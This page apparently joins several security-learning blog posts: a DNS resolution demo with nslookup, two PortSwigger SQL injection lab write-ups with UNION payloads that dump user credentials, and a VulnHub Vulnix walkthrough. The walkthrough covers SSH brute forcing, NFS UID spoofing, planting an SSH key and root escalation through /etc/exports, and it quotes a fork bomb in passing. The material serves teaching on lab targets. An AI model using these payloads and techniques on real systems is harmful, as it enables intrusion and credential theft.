When you type a URL into your browser a number of things happen. Using various online resources I’ve broken it down into 10 steps. I’ve overly simplified the process but there is a lot more going on such as caching, virtual host magic, TCP handshakes, and GET requests.

  1. The client queries the DNS resolver for the location of the domain name,
  2. The DNS resolver queries a root nameserver for the location of the top-level domain (.COM, .ORG, .CO.UK, .NET) nameserver,
  3. The root nameserver responds to the DNS resolver with the IP address of the top level domain nameserver,
  4. The DNS resolver then queries the top level domain nameserver for the location of the domain’s authoritative nameserver,
  5. The top-level domain nameserver tells the DNS resolver the IP address of the authoritative nameserver.
  6. The DNS Resolver then queries the authoritative nameserver for the IP address of the domain.
  7. The authoritative nameserver tells the DNS resolver the IP address of the domain,
  8. The DNS resolver responds back to the client with the IP address of the domain,
  9. The client then sends the request to the target IP address,
  10. The target IP address would then respond with the information the client requested.
Domain Name System Process
Domain Name System Process

DNS Demonstration

Let’s start at the top! using the tool nslookup we can query the root nameservers. We simply set the type of query to the nameserver and then use a full stop to specify the root servers. As you can see from the output below, nslookup returns all the root server nameservers.

┌─[[email protected]]─[~]
└──╼ $nslookup
> set type=ns
> .
Server:		192.168.0.1
Address:	192.168.0.1#53
Non-authoritative answer:
.	nameserver = c.root-servers.net.
.	nameserver = d.root-servers.net.
.	nameserver = e.root-servers.net.
.	nameserver = f.root-servers.net.
.	nameserver = g.root-servers.net.
.	nameserver = h.root-servers.net.
.	nameserver = i.root-servers.net.
.	nameserver = j.root-servers.net.
.	nameserver = k.root-servers.net.
.	nameserver = l.root-servers.net.
.	nameserver = m.root-servers.net.
.	nameserver = a.root-servers.net.
.	nameserver = b.root-servers.net.
Authoritative answers can be found from:

In order to query the root server nameservers, we need to find out what their IP addresses are. In order to do that we set the query type to an A record. An A record translates a word to an IP address.

> set type=a
> a.root-servers.net
Server:		192.168.0.1
Address:	192.168.0.1#53
Non-authoritative answer:
Name:	a.root-servers.net
Address: 198.41.0.4

Next, we need to find the nameservers of the top-level domain. In order to do that, we first set our server to the IP address that we just obtained from our A record query. Next, we set the record type to the nameserver and then query the “.COM” top-level domain. However, ensure you put a full stop after it.

> server 198.41.0.4
Default server: 198.41.0.4
Address: 198.41.0.4#53
> set type=ns
> com.
;; Truncated, retrying in TCP mode.
Server:		198.41.0.4
Address:	198.41.0.4#53
Non-authoritative answer:
*** Can't find com.: No answer
Authoritative answers can be found from:
com	nameserver = e.gtld-servers.net.
com	nameserver = b.gtld-servers.net.
com	nameserver = j.gtld-servers.net.
com	nameserver = m.gtld-servers.net.
com	nameserver = i.gtld-servers.net.
com	nameserver = f.gtld-servers.net.
com	nameserver = a.gtld-servers.net.
com	nameserver = g.gtld-servers.net.
com	nameserver = h.gtld-servers.net.
com	nameserver = l.gtld-servers.net.
com	nameserver = k.gtld-servers.net.
com	nameserver = c.gtld-servers.net.
com	nameserver = d.gtld-servers.net.
e.gtld-servers.net	internet address = 192.12.94.30
e.gtld-servers.net	has AAAA address 2001:502:1ca1::30
b.gtld-servers.net	internet address = 192.33.14.30
b.gtld-servers.net	has AAAA address 2001:503:231d::2:30
j.gtld-servers.net	internet address = 192.48.79.30
j.gtld-servers.net	has AAAA address 2001:502:7094::30
m.gtld-servers.net	internet address = 192.55.83.30
m.gtld-servers.net	has AAAA address 2001:501:b1f9::30
i.gtld-servers.net	internet address = 192.43.172.30
i.gtld-servers.net	has AAAA address 2001:503:39c1::30
f.gtld-servers.net	internet address = 192.35.51.30
f.gtld-servers.net	has AAAA address 2001:503:d414::30
a.gtld-servers.net	internet address = 192.5.6.30
a.gtld-servers.net	has AAAA address 2001:503:a83e::2:30
g.gtld-servers.net	internet address = 192.42.93.30
g.gtld-servers.net	has AAAA address 2001:503:eea3::30
h.gtld-servers.net	internet address = 192.54.112.30
h.gtld-servers.net	has AAAA address 2001:502:8cc::30
l.gtld-servers.net	internet address = 192.41.162.30
l.gtld-servers.net	has AAAA address 2001:500:d937::30
k.gtld-servers.net	internet address = 192.52.178.30
k.gtld-servers.net	has AAAA address 2001:503:d2d::30
c.gtld-servers.net	internet address = 192.26.92.30
c.gtld-servers.net	has AAAA address 2001:503:83eb::30
d.gtld-servers.net	internet address = 192.31.80.30
d.gtld-servers.net	has AAAA address 2001:500:856e::30

We get a lot of results but we should be able to set any of these to our DNS resolver in order to query it for a specific domain nameserver. Set the server to one of the IP addresses listed above and then set the type to nameserver again. Then, choose a domain and punch It in to find its nameservers.

> server 192.5.6.30
Default server: 192.5.6.30
Address: 192.5.6.30#53
> set type=ns
> google.com.
Server:		192.5.6.30
Address:	192.5.6.30#53
Non-authoritative answer:
*** Can't find google.com.: No answer
Authoritative answers can be found from:
google.com	nameserver = ns2.google.com.
google.com	nameserver = ns1.google.com.
google.com	nameserver = ns3.google.com.
google.com	nameserver = ns4.google.com.
ns2.google.com	has AAAA address 2001:4860:4802:34::a
ns2.google.com	internet address = 216.239.34.10
ns1.google.com	has AAAA address 2001:4860:4802:32::a
ns1.google.com	internet address = 216.239.32.10
ns3.google.com	has AAAA address 2001:4860:4802:36::a
ns3.google.com	internet address = 216.239.36.10
ns4.google.com	has AAAA address 2001:4860:4802:38::a
ns4.google.com	internet address = 216.239.38.10

Finally, we can now set our DNS resolver to one of googles nameservers and query it to find A records such as mail. This could of course be scripted to automatically run through each of these steps automatically and perform a subdomain brute force attack against the servers. I believe there is already a tool called Fierce that does exactly that.

> server 216.239.32.10
Default server: 216.239.32.10
Address: 216.239.32.10#53
> set type=a
> mail.google.com.
Server:		216.239.32.10
Address:	216.239.32.10#53
Name:	mail.google.com
Address: 142.250.178.5

Conclusion

I know this isn’t hacking but it’s essential to have a good understanding of the technologies that make the internet and the world wide web possible. There is a lot more to DNS than I’ve covered here. I haven’t discussed the various record types like MX, TXT, and CNAME that can be added to a zone file. I haven’t talked about propagation and caching.

DNS is such as fascinating subject to study because the problem is always DNS. Joking aside, without DNS we would have to remember the IP addresses of every website we wanted to visit. Oh, and those root servers at the top of the tree, if they go down then so does the internet. No more name resolution means anything that has been developed with resources being pulled via domain names will no longer work. It’s a terrifying prospect, especially with all the recent talk of cyber armageddon from the World Economic Forum. If someone with a zero-day were to get into those root servers and mess up the zone files then it would cause chaos. Hopefully, there is some hidden redundancy and backups to mitigate that possibility. Those 13 nameservers are the unsung heroes of the internet and to them I say, thank you. Keep computing away you absolute legends.

PortSwigger: SQL injection attack, listing the database contents on Oracle

Hello world, and welcome to HaXeZ where today we’re looking at PortSwigger Web Security Academy: SQL injection 8. This lab requires you to query the information schema to get the table name, and column names and then perform a UNION injection to get the administration username and password. It’s the same as the last lab except this time we need to alter our syntax as we’re doing it against an Oracle database.

SQL injection attack, listing the database contents on Oracle
SQL injection attack, listing the database contents on Oracle

SQL injection attack, listing the database contents on Oracle

So as stated in the introduction, we need to use Oracle database syntax to perform a UNION-based SQL injection to retrieve the contents of the database. More specifically, we need to dump the contents of the users’ table and log in to the application as the administrator in order to solve the lab.

The Lab
The Lab

The Application

First things first, we need to explore the familiar application. it’s exactly the same as with the previous lab. There is a navigation menu at the top of the page and some product details underneath. It appears there are two columns, which we can validate using the ‘NULL, NULL+FROM+DUAL-- ‘ syntax that we used in previous exercises.

The Application
The Application

Querying The Database Tables

Once we have verified that there are two columns and that both allow text, we can start querying the database for all table names. Instead of querying the ‘information.schema‘ table that we use in the previous lab, this time we have to query ‘all_tables‘. The syntax below will return all tables currently in the database. Please note that rendering directly through burp may not show all the tables. I had to switch back to the raw mode in order to find the user’s table.

GET /filter?category=Accessories'+UNION+SELECT+table_name,NULL+FROM+all_tables-- HTTP/1.1
SQL Injection - Querying The Database Tables
SQL Injection – Querying The Database Tables

Querying The Table Columns

Once we have the table name, in this case ‘USERS_GVOYYA‘, we can start querying the columns within that table. In order to do this, we need to use ‘all_tab_columns‘ and specify the table which we found using the previous command. As you can see from the screenshot below, this produces two results ‘PASSWORD_HPZDJL‘ and ‘USERNAME_SYDOYL‘.

GET /filter?category=Accessories'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_GVOYYA'-- HTTP/1.1
SQL Injection - Querying The Table Columns
SQL Injection – Querying The Table Columns

Querying The Colum Data

We now have everything we need to query the table directory and get it to dump its secrets. The screenshot below illustrates that it was possible to dump the contents of the ‘USERS_GVOYYA‘ including the username and password of the administrator users. Using this information we should be able to complete the lab.

GET /filter?category=Accessories'+UNION+SELECT+PASSWORD_HPZDJL,+USERNAME_SYDOYL+FROM+USERS_GVOYYA-- HTTP/1.
SQL Injection - Querying The Colum Data
SQL Injection – Querying The Colum Data

The SQL Injection

Then take results of the SQL injection and head over to the login page link at the top of the screen. Input your newly acquired username and password and you should solve the lab. Congratulations.

Log in
Log in

PortSwigger: SQL injection attack, listing the database contents on non-Oracle databases

Hello World, and welcome to HaXeZ where today we’re looking at PortSwigger Web Security Academy: SQL injection 7. This lab requires you to query the information schema to get the table name, and column names and then perform a UNION injection to get the administration username and password.

SQL injection attack, listing the database contents on non-Oracle databases
SQL injection attack, listing the database contents on non-Oracle databases

SQL injection attack, listing the database contents on non-Oracle databases

So as mentioned above, this lab requires some logical thinking when structuring your query. First, you need to query the information schema to find out what tables there are. Then you need to query it again to find out what columns are in a particular table. Finally, you have to modify your attack to query the specific table to return the contents of the specified columns.

SQL injection lab
The Lab

The Application

Navigating to the application we can see it is laid out like the rest of them with the navigation menu at the top and the list of products underneath. In order to capture a request, we need to turn the intruder on in Burp Suite and click on the navigation URLs to capture it.

The Application
The Application

Querying The Database Tables

With the request captured, we can perform our standard column enumeration to determine how many columns there are and which columns contain text. Once we have identified that there are two columns that both contain text, we can query the ‘information_schema‘ table so that it returns the names of all other tables in the database.

'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
SQL Injection - Querying The Database Tables
SQL Injection – Querying The Database Tables

Querying The Table Columns

Now that we know the names of the tables, we can identify which tables might be interesting. Looking at the results we can see that there is a table called ‘users_odzpcz‘. This table will likely contain some juicy user credentials but in order to proceed, we need to know what columns are in that table. The image below shows the result of the query where we’re asking for the column names.

'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_odzpcz'--
SQL Injection - Querying The Table Columns
SQL Injection – Querying The Table Columns

Querying The Colum Data

Now that we have the column names, we can query the table directly and ask it to dump the contents of the two columns ‘password_nawvpk‘ and ‘username_bzubfy‘. I found that it was important to put the column names in the order that they appeared in the previous query. Otherwise, I just received a server error.

'+UNION+SELECT+password_nawvpk,+username_bzubfy+FROM+users_odzpcz--
Querying The Colum Data
SQL Injection – Querying The Colum Data

The SQL Injection

With the SQL injection complete, all we need to do is look through the data and locate the administrator username and password. Once we have that information, we can head to the login page and use the credentials to log in and complete the lab.

The Login
The Login

VulnHub: Vulnix

Dear friend, thank you for stopping by HaXeZ! In this article, I will be going through the VulnHub box Vulnix. This box requires you to perform some basic reconnaissance to discover services. You then need to abuse those services to gather more information that can be used with other attacks. I like this box as the scenario it presents is realistic. It is also a good box for learning about the Network File System service.

Vulnix Reconnaissance

First, we need to see what the IP of the box is. In order to do this, we can perform a ping sweep of our host-only network and see what responds. As you can see from the output below, it appears that our target IP address is 192.168.56.105.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sP 192.168.56.0/24
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-07 16:46 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.1
Host is up (0.00016s latency).
MAC Address: 0A:00:27:00:00:0B (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00021s latency).
MAC Address: 08:00:27:F3:D2:81 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.105
Host is up (0.00060s latency).
MAC Address: 08:00:27:01:3D:75 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.83 seconds

Next, we need to see what services are listening on the box. In order to do this, we can run a Nmap TCP scan which performs banner grabs on all ports. As you can see we have a number of services such as SSH, SMTP, Finger and NFS.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -sT -p0- 192.168.56.105

Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-07 16:47 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.105
Host is up (0.00017s latency).
Not shown: 65519 closed tcp ports (conn-refused)
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 
25/tcp    open  smtp     Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, 
79/tcp    open  finger   Debian fingerd
110/tcp   open  pop3     Dovecot pop3d
111/tcp   open  rpcbind  2-4 (RPC #100000)
143/tcp   open  imap     Dovecot imapd
512/tcp   open  exec     netkit-rsh rexecd
513/tcp   open  login    OpenBSD or Solaris rlogind
514/tcp   open  shell    Netkit rshd
993/tcp   open  ssl/imap Dovecot imapd
995/tcp   open  ssl/pop3 Dovecot pop3d
2049/tcp  open  nfs_acl  2-3 (RPC #100227)
MAC Address: 08:00:27:01:3D:75 (Oracle VirtualBox virtual NIC)
Service Info: Host:  vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.30 seconds

Vulnix SMTP User Enumeration

We can see port 25 is open so we can use this to enumerate users using the VRFY command. There are a number of tools that can perform this enumeration. Nmap has an NSE script that can enumerate users but there are also independent Python and Perl scripts as well as a Metasploit module. We’re going to use the meta sploit module and set the RHOSTS to the IP address of the target.

msf6 auxiliary(scanner/smtp/smtp_enum) > set rhosts 192.168.56.105
msf6 auxiliary(scanner/smtp/smtp_enum) > exploit
[*] 192.168.56.105:25     - 192.168.56.105:25 Banner: 220 vulnix ESMTP Postfix 
[+] 192.168.56.105:25     - 192.168.56.105:25 Users found: User, Vulnix, backup, bin, daemon, games, gnats, irc, landscape, libuuid, list, lp, mail, man, messagebus, news, nobody, postfix, postmaster, proxy, sshd, sync, sys, syslog, user, user, uucp, vulnix, whoopsie, www-data
[*] 192.168.56.105:25     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Vulnix Finger Enumeration

We know from the Nmap scan that the Finger service is listening. This service should also allow us to enumerate users. We already have a good wordlist from the SMTP user enumeration but lets enumerate Finger to get as much information out of Vulnix as possible.

msf6 auxiliary(scanner/finger/finger_users) > set rhosts 192.168.56.105
msf6 auxiliary(scanner/finger/finger_users) > exploit
[+] 192.168.56.105:79     - 192.168.56.105:79 Users found: backup, bin, daemon, dovecot, dovenull, games, gnats, irc, landscape, libuuid, list, lp, mail, man, messagebus, news, nobody, postfix, proxy, root, sshd, sync, sys, syslog, user, uucp, vulnix, whoopsie, www-data
[*] 192.168.56.105:79     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

SSH Brute Force

Now that we have a good list of users, we can attempt to brute force SSH in order to gain access to the host. To do this we will use the THC Hydra brute forcing tool with our usernames wordlist and the rockyou password list.

┌──(kali㉿kali)-[~/Documents]
└─$ sudo hydra -V -L users.txt -P rockyou.txt 192.168.56.105 ssh -t 4                                                                            
[DATA] max 4 tasks per 1 server, overall 4 tasks, 415987542 login tries (l:29/p:14344398), ~103996886 tries per task
[DATA] attacking ssh://192.168.56.105:22/
[ATTEMPT] target 192.168.56.105 - login "User" - pass "123456" - 1 of 415987542 

NFS Enumeration

While Hydra is running we can continue probing the services on the box for more information. Our Nmap scan showed us that the Network File Service or NFS Service was listening. We can use a tool called showmount to see if there are any exports or shares available.

┌──(kali㉿kali)-[~/Documents]
└─$ sudo showmount -e 192.168.56.105                   
Export list for 192.168.56.105:
/home/vulnix *

Based on the information from showmount we can attempt to mount the /home/vulnix mount that we found. However, when we try to list out the contents of /mnt/vulnix, we get a permission denied error.

┌──(kali㉿kali)-[~/Documents]
└─$ sudo mkdir /mnt/vulnix 

┌──(kali㉿kali)-[~/Documents]
└─$ sudo mount 192.168.56.105:/home/vulnix /mnt/vulnix -o vers=3

┌──(kali㉿kali)-[~/Documents]
└─$ ls /mnt/vulnix        
ls: cannot open directory '/mnt/vulnix': Permission denied

The mount command I used above mounts the NFS share using an older version. The reason for this is so that we can see the Username and UID. While we don’t have permission to see the contents of the directory, we can still see the directory. You can see below that the UID is 2008. You can also so that the username is vulnix.

┌──(kali㉿kali)-[~/Documents]
└─$ ls -lash /mnt         
total 52K
4.0K drwxr-xr-x  4 root   root   4.0K May  7 16:36 .
 40K drwxr-xr-x 19 root   root    36K Apr 26 11:40 ..
4.0K drwxr-x---  4 vulnix vulnix 4.0K May  7 15:39 vulnix

┌──(kali㉿kali)-[~/Documents]
└─$ ls -laShn /mnt                                              
total 52K
drwxr-xr-x 19    0    0  36K Apr 26 11:40 ..
drwxr-xr-x  4    0    0 4.0K May  7 16:36 .
drwxr-x---  4 2008 2008 4.0K May  7 15:39 vulnix

Vulnix Foothold

A common misconfiguration in NFS allows us to create a user with the same username and same UID to access the files.

┌──(kali㉿kali)-[~/Documents]
└─$ sudo adduser -u 2008 vulnix

Now if we switch users to the vulnix user we should be able to list the contents of the NFS share.

┌──(kali㉿kali)-[~/Documents]
└─$ su vulnix                   
Password: 

┌──(vulnix㉿kali)-[/home/kali/Documents]
└─$ ls -laSh /mnt/vulnix
total 32K
drwxr-x--- 4 vulnix vulnix 4.0K May  7 15:39 .
drwxr-xr-x 4 root   root   4.0K May  7 16:36 ..
drwx------ 2 vulnix vulnix 4.0K May  7 15:23 .cache
-rw-r--r-- 1 vulnix vulnix 3.5K Apr  3  2012 .bashrc
-rw-r--r-- 1 vulnix vulnix  675 Apr  3  2012 .profile
-rw-r--r-- 1 vulnix vulnix  220 Apr  3  2012 .bash_logout
-rw------- 1 vulnix vulnix   94 May  7 16:35 .bash_history

Next, we need to make a .ssh directory on /mnt/vulnix so that we can copy a public key across and use it to access the machine.

┌──(vulnix㉿kali)-[/home/kali/Documents]
└─$ mkdir /mnt/vulnix/.ssh  

Next, we generate the SSH key that we are going to copy across and use to access the server. However, as this box is quite old and modern systems no longer supper ssh-rsa, we need to specify that method.

┌──(vulnix㉿kali)-[/home/kali/Documents]
└─$ ssh-keygen -t ssh-rsa
Generating public/private ssh-rsa key pair.

Now that we have our private and public keys, we can copy our public key onto the mount point. We need to copy it into the .ssh directory with the name authorized_keys.

┌──(vulnix㉿kali)-[~]
└─$ cp .ssh/id_rsa.pub /mnt/vulnix/.ssh/authorized_keys

We can now SSH to the box using our private key and it should allow us to log in as the vulnix user. However, as with creating the key, we need to tell our SSH client to accept the old ssh-rsa algorithm.

┌──(vulnix㉿kali)-[~]
└─$ ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i id_rsa  [email protected]                                                                                                               
Warning: Identity file id_rsa not accessible: No such file or directory.
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
 * Documentation:  https://help.ubuntu.com/
  System information as of Sat May  7 22:22:42 BST 2022
  System load:  0.0              Processes:           92
  Usage of /:   90.3% of 773MB   Users logged in:     1
  Memory usage: 1%               IP address for eth0: 192.168.56.105
  Swap usage:   0%
  => / is using 90.3% of 773MB
  Graph this data and manage this system at https://landscape.canonical.com/
Last login: Sat May  7 21:24:35 2022 from 192.168.56.102
[email protected]:~$ 

Privilege Escalation

We now have SSH access to the box as the user vulnix. We still need to root the box though. The first thing to do is to see whether we have sudo.

[email protected]:~$ sudo -ll
Matching 'Defaults' entries for vulnix on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vulnix may run the following commands on this host:
Sudoers entry:
    RunAsUsers: root
    Commands:
        sudoedit /etc/exports
    RunAsUsers: root
    Commands:
        NOPASSWD: sudoedit /etc/exports

It would appear that we have limited sudo access which allows us to sudoedit /etc/exports without a password. The /etc/exports file is what we use to configure NFS. This file allows us to specify which parts of the filesystem are accessible to the public. Here we can configure the root user’s home directory as an NFS share.

[email protected]:~$ sudoedit /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix    *(rw,root_squash)
/root           *(rw,no_root_squash)

In order to make the changes, we need to hard reboot the machine. This isn’t the best option as we don’t have permission to run a reboot and we may not have physical access to the server. Unfortunately, this is the only option we have at this stage. We could run a fork bomb ((){ :|:& };:) to exhaust the resources on the system and force it to reboot but we will just reboot it.

Vulnix Getting root

Once the system has rebooted, we can run the showmout tool again to see if the root user’s home directory has been shared.

┌──(kali㉿kali)-[~]
└─$ sudo showmount -e 192.168.56.105 
Export list for 192.168.56.105:
/root        *
/home/vulnix *

Fantastic, the root user’s home directory has been shared. We should now be able to make another directory and mount it.

┌──(kali㉿kali)-[~]
└─$ sudo mkdir /mnt/vulnroot

┌──(kali㉿kali)-[~]
└─$ sudo mount 192.168.56.105:/root /mnt/vulnroot -o vers=3

┌──(kali㉿kali)-[~]
└─$ sudo ls -laSh /mnt/vulnroot                            
total 36K
drwx------ 4 root root 4.0K May  7 16:40 .
drwxr-xr-x 4 root root 4.0K May  7 16:36 ..
drwx------ 2 root root 4.0K Sep  2  2012 .cache
-rw-r--r-- 1 root root 3.1K Apr 19  2012 .bashrc
-rw------- 1 root root  710 Sep  2  2012 .viminfo
-rw-r--r-- 1 root root  140 Apr 19  2012 .profile
-r-------- 1 root root   33 Sep  2  2012 trophy.txt
-rw------- 1 root root   18 May  7 16:28 .bash_history

With the root user’s home directory mounted, we can now repeat the process of copying an SSH public key into the authorized_keys file. First, we need to create the .ssh directory. Next, we need to create a new SSH key pair (ensuring to specify the rsa-ssh type). After that, we have to copy the public key to the SSH directory and call it authorized_keys.

┌──(kali㉿kali)-[~]
└─$ sudo mkdir /mnt/vulnroot/.ssh 

┌──(kali㉿kali)-[~/Documents]
└─$ ssh-keygen -t ssh-rsa        
Generating public/private ssh-rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa):

┌──(kali㉿kali)-[~]
└─$ sudo cp .ssh/id_rsa.pub /mnt/vulnroot/.ssh/authorized_keys

Finally, we can see to the box as root and capture the trophy… although we could have captured it when we mounted the NFS share. Wheres the fun in that.

┌──(kali㉿kali)-[~]
└─$ sudo ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i .ssh/id_rsa  [email protected]
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/
  System information as of Sat May  7 22:37:31 BST 2022
  System load:  0.0              Processes:           93
  Usage of /:   90.3% of 773MB   Users logged in:     2
  Memory usage: 1%               IP address for eth0: 192.168.56.105
  Swap usage:   0%
  => / is using 90.3% of 773MB
  Graph this data and manage this system at https://landscape.canonical.com/

Last login: Sat May  7 21:42:13 2022 from 192.168.56.102
[email protected]:~# cat trophy.txt 
cc614640424f5bd60ce5d5264899c3be

So that’s it, the box is owned, we captured the key and learned all about NFS along the way. As for that Hydra session that was running, I believe it found a password for the user named user and it was ‘letmein’. Not that we needed it.

Thanks for reading.